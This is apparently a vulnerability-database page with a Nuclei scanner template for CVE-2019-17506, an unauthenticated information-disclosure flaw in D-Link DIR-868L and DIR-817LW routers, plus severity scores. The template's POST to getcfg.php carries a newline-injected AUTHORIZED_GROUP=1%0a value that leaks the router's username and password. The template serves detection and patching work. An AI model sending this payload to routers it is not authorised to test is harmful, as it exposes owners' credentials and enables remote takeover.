Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-17506
HistoryFeb 01, 2021 - 12:41 a.m.

D-Link DIR-868L/817LW - Information Disclosure

2021-02-0100:41:22
ProjectDiscovery
github.com
1

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.3 High

AI Score

Confidence

High

0.871 High

EPSS

Percentile

98.6%

D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers are vulnerable to information disclosure vulnerabilities because certain web interfaces do not require authentication. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely.
id: CVE-2019-17506

info:
  name: D-Link DIR-868L/817LW - Information Disclosure
  author: pikpikcu
  severity: critical
  description: |
    D-Link DIR-868L B1-2.03 and DIR-817LW A1-1.04 routers are vulnerable to information disclosure vulnerabilities because certain web interfaces do not require authentication. An attacker can get the router's username and password (and other information) via a DEVICE.ACCOUNT value for SERVICES in conjunction with AUTHORIZED_GROUP=1%0a to getcfg.php. This could be used to control the router remotely.
  impact: |
    An attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and credentials.
  remediation: |
    Apply the latest firmware update provided by D-Link to fix the information disclosure vulnerability.
  reference:
    - https://github.com/dahua966/Routers-vuls/blob/master/DIR-868/name%26passwd.py
    - https://nvd.nist.gov/vuln/detail/CVE-2019-17506
    - https://github.com/openx-org/BLEN
    - https://github.com/sobinge/nuclei-templates
    - https://github.com/SexyBeast233/SecBooks
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-17506
    cwe-id: CWE-306
    epss-score: 0.90196
    epss-percentile: 0.98577
    cpe: cpe:2.3:o:dlink:dir-868l_b1_firmware:2.03:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dlink
    product: dir-868l_b1_firmware
  tags: cve,cve2019,dlink,router,disclosure

http:
  - method: POST
    path:
      - "{{BaseURL}}/getcfg.php"

    body: |
      SERVICES=DEVICE.ACCOUNT&AUTHORIZED_GROUP=1%0a

    headers:
      Content-Type: text/xml

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</password>"
          - "DEVICE.ACCOUNT"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022065244100e82c2132ea02d435d322fa8d22c35c421e974e249fcf52f25a0e85a7022100fd742e6f046954c9bbc1d4c20a76ac172a0759ad3ea84f173f2a9be006565206:922c64590222798bb761d5b6d8e72950

10 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.3 High

AI Score

Confidence

High

0.871 High

EPSS

Percentile

98.6%

Related for NUCLEI:CVE-2019-17506